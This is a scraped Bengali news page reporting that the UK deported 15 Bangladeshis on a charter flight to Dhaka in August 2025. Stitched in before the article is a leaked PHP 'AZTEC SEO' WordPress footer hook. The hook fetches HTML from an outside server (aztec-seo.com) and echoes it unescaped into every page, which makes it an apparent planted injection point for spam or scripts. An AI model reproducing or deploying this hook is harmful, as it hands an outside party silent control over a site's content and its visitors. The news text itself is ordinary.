/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ১৫ বাংলাদেশিকে ফেরত পাঠাল যুক্তরাজ্য | Dhaka Sky News

শিশুরা জেদী হয়ে উঠলে করণীয় কী

আগের সংবাদ

শিক্ষার্থীদের ‘ভালো কর্মী’ হিসেবে গড়া অপরিহার্য

পরের সংবাদ

১৫ বাংলাদেশিকে ফেরত পাঠাল যুক্তরাজ্য

ঢাকা স্কাইনিউজ রিপোর্ট

প্রকাশিত: August 29, 2025 , 7:13 pm

মার্কিন যুক্তরাষ্ট্রের পর এবার অবৈধ বাংলাদেশি অভিবাসীদের দেশে ফেরত পাঠাতে শুরু করেছে যুক্তরাজ্যও। ইতোমধ্যেই দেশটি ১৫ বাংলাদেশিকে দেশে ফেরত পাঠিয়েছে। এসব অভিবাসীর বিরুদ্ধে অভিবাসন আইন লঙ্ঘনের অভিযোগ করা হয়েছে।

আজ ২৯ আগস্ট শুক্রবার একটি বিশেষ চার্টার ফ্লাইটে তাদের দেশে পাঠানো হয়। বৃহস্পতিবার স্থানীয় সময় রাত ৯টায় লন্ডনের স্ট্যানস্টেড বিমানবন্দর থেকে ছেড়ে ফ্লাইট এইচএফএম৮৫১ ইসলামাবাদ হয়ে শুক্রবার বেলা ২টা ১০ মিনিটে ঢাকায় পৌঁছায়।

ফেরত আসা যাত্রীদের জন্য ট্রাভেল পারমিট ইস্যু করা হয়েছিল। তাদের মধ্যে কেউ বৈধ পাসপোর্টধারী, কারো পাসপোর্টের মেয়াদ উত্তীর্ণ হয়েছে। ফেরত আসা ব্যক্তিদের মধ্যে নারীও আছেন বলে জানায় বাংলাদেশ হাইকমিশনের কনসুলার শাখা।

যাত্রী তালিকা অনুযায়ী, তারা মূলত সিলেট, সুনামগঞ্জ, মৌলভীবাজার, কুমিল্লা, ব্রাহ্মণবাড়িয়া, চট্টগ্রাম, নোয়াখালী ও ঢাকাসহ বিভিন্ন জেলার বাসিন্দা। ফেরত আসা ১৫ জনের মধ্যে অন্তত ৬ জনের কোনো পেশা উল্লেখ ছিল না। বাকিদের মধ্যে কেউ যুক্তরাজ্যে ওয়েটার হিসেবে কাজ করতেন, কেউবা ছিলেন শিক্ষার্থী।

যুক্তরাজ্যের অভিবাসন কর্তৃপক্ষ সম্প্রতি অবৈধ অভিবাসীদের বিরুদ্ধে কঠোর ব্যবস্থা গ্রহণ শুরু করেছে। বাংলাদেশ সরকারের সঙ্গে সমন্বয় করেই ফেরত পাঠানোর এ প্রক্রিয়া সম্পন্ন করা হয়েছে।

পররাষ্ট্র মন্ত্রণালয়ের এক কর্মকর্তা গণমাধ্যমকে জানান, অনেক বাংলাদেশির ভিসার মেয়াদ শেষ হওয়ার পরও অবৈধভাবে অবস্থান করছিলেন। যুক্তরাজ্য তাদের নিজস্ব আইনের ভিত্তিতেই ব্যবস্থা নিচ্ছে।